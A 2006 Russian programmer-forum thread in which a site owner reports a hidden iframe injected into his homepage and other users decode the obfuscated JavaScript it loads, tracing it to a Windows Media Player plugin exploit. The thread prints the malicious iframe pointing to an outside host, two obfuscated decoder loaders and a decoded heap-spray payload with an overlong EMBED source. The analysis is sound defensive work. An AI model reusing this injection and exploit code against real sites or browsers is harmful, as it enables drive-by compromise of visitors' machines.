VPF::Хакеры везде - Форум программистов

Всемогущий

Дата 2.12.2006, 18:49 (ссылка)

(нет голосов)

Загрузка ...

Опытный

Профиль
Группа: Участник
Сообщений: 440
Регистрация: 25.6.2006
Где: Челябинск

Репутация: нет
Всего: 13

на главную страницу моего сайта каким то неведомым образом попал код

Код


<!--iframe width=1 height=1 border=0 frameborder=0 src='http://aboutmynews.org/news/InF.php' style='display:none;'></iframe-->
<iframe width=1 height=1 border=0 frameborder=0 src='http://aboutmynews.org/news/InF.php' style='display:none;'></iframe>

InF.php
содержит вот такой жабаскрипт:

Код


<script language=JavaScript>function decd(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,33,34,18,11,50,8,23,57,4,0,0,0,0,0,0,27,1,55,13,41,48,42,20,6,2,29,54,36,45,53,38,22,58,56,28,52,61,9,21,17,37,14,0,0,0,0,35,0,60,40,51,26,43,49,7,5,31,15,0,44,59,12,19,24,16,25,10,39,62,32,30,46,47,3);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decd("rdMf7cSNX7p59ylEqolEk_8c9jCfP@aNn7JThdUNH_81XeSNHenT4gCE7ypNC7U1@OD2P@aNn7JT@I")</script>

Я ничего не понимаю в JavaScript
пожалуйста хотя бы в двух словах скажите что он делает

--------------------

Цитата(smartov @ 16.1.2007, 13:26

)

Видел я PHP код, который пишут наСильники, никогда на php не писавшие :D То еще зрелище. Все пытаются сделать руками и через ж (как в С привыкли). Все пытаются память освобождать итд итп.

Greg

Дата 2.12.2006, 20:51 (ссылка)

(нет голосов)

Загрузка ...

Бывалый

Профиль
Группа: Участник
Сообщений: 158
Регистрация: 16.9.2006
Где: Беларусь, г.Минск

Репутация: нет
Всего: 7

Я жаваскриптъ не знаю конечно,но тут очевидно идёт подбор ключа по известному хешу на клиенте.

--------------------

Страх перед возможностью ошибки не должен отвращать нас от поисков истины.

smartov

Дата 2.12.2006, 22:58 (ссылка)

(нет голосов)

Загрузка ...

свой собственный

Профиль
Группа: Экс. модератор
Сообщений: 4225
Регистрация: 2.2.2006
Где: NJ

Репутация: 7
Всего: 259

Да. Похоже что так и есть.
К какому-то неслабому хешу побирает ключ. Интересная идея конечно.

satrap

Дата 3.12.2006, 00:16 (ссылка)

(нет голосов)

Загрузка ...

Новичок

Профиль
Группа: Участник
Сообщений: 18
Регистрация: 29.11.2006

Репутация: 1
Всего: 1

Этот код извлекает из строки следующий html код:

<script language=javascript src="topcounter.php"></script>

и добавляет его в документ. В файле topcounter код:

Код


function dec(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,15,49,33,17,0,43,48,36,37,0,0,0,0,0,0,50,3,8,1,40,10,14,53,21,60,31,7,2,55,26,25,19,18,38,34,11,23,46,30,6,45,58,0,0,0,0,62,0,44,42,28,41,39,4,35,54,27,5,32,51,24,57,52,61,12,20,56,9,47,22,59,29,16,13);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dec("ONY2UlcG4Um@fua7yPa75gn31PIofiY2UlcG4JsRjFz2UUDGjSO3yuq7viq2HAcgKLBo4QO8rLBo4QO8rLBo4QO8rLBo4QO8rLBo4QO8rLBo4QO8rLBo4QO8rLBo4QO8rWBgWvm7EUDMjNx3FSO3vwO3mUDozlc@5Umgvum@5ua74Mc3Ovm9xUteHvO9HvtgWvDGjZBRjRdSviIGqUxoiSZ6OLFZeAWsjN0pRgn3BSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBSBQFn8P_neJ_nRiVnRKWs3KFskAFsg1_sgTVsSTWwYMWwalFwa0_wu0VwVwVwdeWZdPFn8AZZ6u_Zb6VZbPFn8AEpoP1pMJ0pMiuphiJI2KJI7A1I710Il1uI@TuIpMJ0pl10Il000000HvO9HQt9rQn9UWn9vNd9vXO84Xt8yLt8PFn8PEd8QEOexhOec@tecVDoB1p3iRdSkg_nkK_RD_EbuL");

Тоесть тоже какаято дрянь, которая трансформируется в javascript. Обнови ПО на сервере, похоже в нем есть уязвимости. smile

Это сообщение отредактировал(а) satrap - 3.12.2006, 00:31

smartov

Дата 3.12.2006, 00:32 (ссылка)

(нет голосов)

Загрузка ...

свой собственный

Профиль
Группа: Экс. модератор
Сообщений: 4225
Регистрация: 2.2.2006
Где: NJ

Репутация: 7
Всего: 259

Может это провайдер просто счетчик поставил? smile

Всемогущий, в любом случае что там с topcounter.php посмотри.

satrap, у автора постов не хватит, тебе + за наблюдательность.

Добавлено @ 00:39

Цитата(satrap @ 2.12.2006, 23:16

)

которая трансформируется в javascript.

Вот в такой кстати:

Код


<script language="javascript"> var s = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); do { s += s; } while (s.length < 0x0900000); s += </script>
<EMBED SRC="----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></EMBED>

satrap

Дата 3.12.2006, 01:24 (ссылка)

(нет голосов)

Загрузка ...

Новичок

Профиль
Группа: Участник
Сообщений: 18
Регистрация: 29.11.2006

Репутация: 1
Всего: 1

Цитата(smartov @ 3.12.2006, 00:32

)

Может это провайдер просто счетчик поставил? smile

Сомнительно, так как очень похоже на это:
Windows Media Player Plug-in for Non-Microsoft Browsers Code Execution (MS06-006) - Exploit II

smartov

Дата 3.12.2006, 12:45 (ссылка)

(нет голосов)

Загрузка ...

свой собственный

Профиль
Группа: Экс. модератор
Сообщений: 4225
Регистрация: 2.2.2006
Где: NJ

Репутация: 7
Всего: 259

Цитата

// Tested:
// Firefox 1.5.0.1
// Windows Media Player 10
// Windows XP SP2 (US)

Мдя

А уязвимость то, Лисиная smile

NightmareZ

Дата 3.12.2006, 14:21 (ссылка)

(нет голосов)

Загрузка ...

[хакер]

Профиль
Группа: Участник
Сообщений: 699
Регистрация: 10.8.2006

Репутация: нет
Всего: 13

Ужость, кругом хакиры! smile

Цитата(Всемогущий @ 2.12.2006, 18:49

)

на главную страницу моего сайта каким то неведомым образом попал код

А што за страничка? Дол бы хоть сцылку, пасматреть интиресно.

Это сообщение отредактировал(а) NightmareZ - 3.12.2006, 14:34

--------------------

NightmareZ.net - мой блог и сайт, мои проекты и прочий трэш
Ely-Art.ru - наша маленькая домашняя арт-студия
mugcraft.ru - кружки на любой вкус

Всемогущий

Дата 3.12.2006, 21:46 (ссылка)

(нет голосов)

Загрузка ...

Опытный

Профиль
Группа: Участник
Сообщений: 440
Регистрация: 25.6.2006
Где: Челябинск

Репутация: нет
Всего: 13

Цитата(NightmareZ @ 3.12.2006, 16:21

)

А што за страничка? Дол бы хоть сцылку, пасматреть интиресно.

Пожалуйста....
"ЕДИНАЯ РОССИЯ"-Челябинское Региональное Отделене
ясно что я убрал вредный код , но кому интересно

--------------------

Цитата(smartov @ 16.1.2007, 13:26

)

smartov

Дата 3.12.2006, 23:34 (ссылка)

(нет голосов)

Загрузка ...

свой собственный

Профиль
Группа: Экс. модератор
Сообщений: 4225
Регистрация: 2.2.2006
Где: NJ

Репутация: 7
Всего: 259

offtop begin

Цитата(Всемогущий @ 3.12.2006, 20:46

)

"ЕДИНАЯ РОССИЯ"

Всемогущий,

Владимир Владимирович? smile

offtop end

Всемогущий

Дата 4.12.2006, 13:39 (ссылка)

(нет голосов)

Загрузка ...

Опытный

Профиль
Группа: Участник
Сообщений: 440
Регистрация: 25.6.2006
Где: Челябинск

Репутация: нет
Всего: 13

конечно нет smile

--------------------

Цитата(smartov @ 16.1.2007, 13:26

)

1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема \| JavaScript: Общие вопросы \| Следующая тема »